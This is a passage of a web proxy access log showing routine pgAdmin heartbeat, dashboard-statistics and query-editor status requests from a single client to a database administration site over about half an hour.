pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:26:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:26:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:26:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:27:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:27:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:28:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:28:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:29:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:29:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:30:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:30:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:31:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:31:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:31:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:32:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:32:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:33:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:33:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:34:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:34:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:35:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:35:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:36:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:36:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:36:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:37:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:37:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:38:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:38:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:39:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:39:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:40:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:40:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:41:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:41:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:41:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:42:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:42:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:43:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:43:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:44:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:44:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:45:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:45:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:46:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:46:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:46:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:47:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:47:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:48:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:48:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:49:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:49:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:50:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:50:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:51:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:51:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:51:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:52:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:52:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:53:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:53:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:54:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:54:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:55:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:55:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:56:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:56:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:56:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:57:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:57:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:58:13 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:58:13 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:58:13 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:11:58:15 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" 